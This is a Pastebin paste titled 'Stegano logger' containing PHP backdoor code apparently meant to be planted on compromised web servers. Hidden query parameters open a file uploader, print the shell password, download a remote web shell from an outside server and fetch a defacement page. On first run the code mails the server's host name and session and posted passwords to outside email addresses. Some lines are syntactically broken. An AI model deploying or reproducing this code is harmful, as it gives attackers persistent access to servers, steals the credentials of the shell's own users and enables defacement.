Advertisement
Ribang

Stegano logger

Jan 22nd, 2018
293
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
  1. <?php
  2. $up = " <html>
  3. <head>
  4. <title>Uploader By FirewalL21</title>
  5. </head>
  6. <body>
  7. <center>
  8. <h1><font face=\"Tahoma\" size=\5\" color=\"#blue\">FirewalL21 Uploader</font></h1>
  9. <form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">
  10. <table border=\"1\">
  11. <tr>
  12. <td bgcolor=\"#000000\">
  13. <font color=\"#00ff00\">
  14. <input type=\"file\" name=\"file\" size=\"50\">
  15. <td bgcolor=\"#ff0000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\">
  16. </td>
  17. </td>
  18. </tr>
  19. </table>
  20. </form>
  21. </center>
  22. </body>";
  23.  
  24. if( $_POST['_upl'] == "Upload File" ) {
  25. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  26. echo '<b><center>
  27. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
  28. }
  29. else {
  30. echo '
  31. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
  32. }
  33. }
  34. if(isset($_GET["0upload"])){
  35. echo "$up";
  36. }
  37. /////////////////////////////
  38. if(isset($_GET["0cek"])){
  39. echo "Password E :".$auth_pass;
  40. }
  41. /////////////////////////////
  42. if (file_exists('.db'))
  43. { } else {
  44. $subject = $_SERVER['SERVER_NAME'];
  45. $header = "From: Mastah <[email protected]>";
  46. $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
  47. mail($to, $subject, $message, $header);*/
  48. $pass1 = $_SESSION['pass'];
  49. $pass2 = $_POST['pass'];
  50. $ip = $_SERVER['SERVER_ADDR'];
  51. $info = $_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
  52. $msg = "Host: $info | Session Pass: $pass1 & Post Pass: $pass2";
  53. mail("[email protected],[email protected]","ActShellV.2: $ip",$msg);
  54. $m = fopen(".db", "w") or die (" ");
  55. $txt = "";
  56. fwrite($m, $txt);
  57. fclose($m);
  58. chmod(".db",0644); }
  59. /////////////////////////////
  60. if(isset($_GET["0shell"])){
  61. $anak1 = file_get_contents("http://server.indoxploit.or.id/indoxploit_v3.txt");
  62. $nggawe1 = fopen("firewall21.php","w") or die ("gabisa pak");
  63. fwrite($nggawe1,$anak1);
  64. fclose($nggawe1);
  65. header ("Location:firewall21.php");
  66. chmod("firewall21.php",0644);}
  67. //////////////////////////////
  68. if(isset($_GET["0deface"])){
  69. $anak = file_get_contents("https://pastebin.com/raw/HymYrpHG");
  70. $nggawe = fopen("firewall21.htm","w") or die ("gabisa pak");
  71. fwrite($nggawe,$anak);
  72. fclose($nggawe);
  73. header ("Location:firewall21.htm");}
  74. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement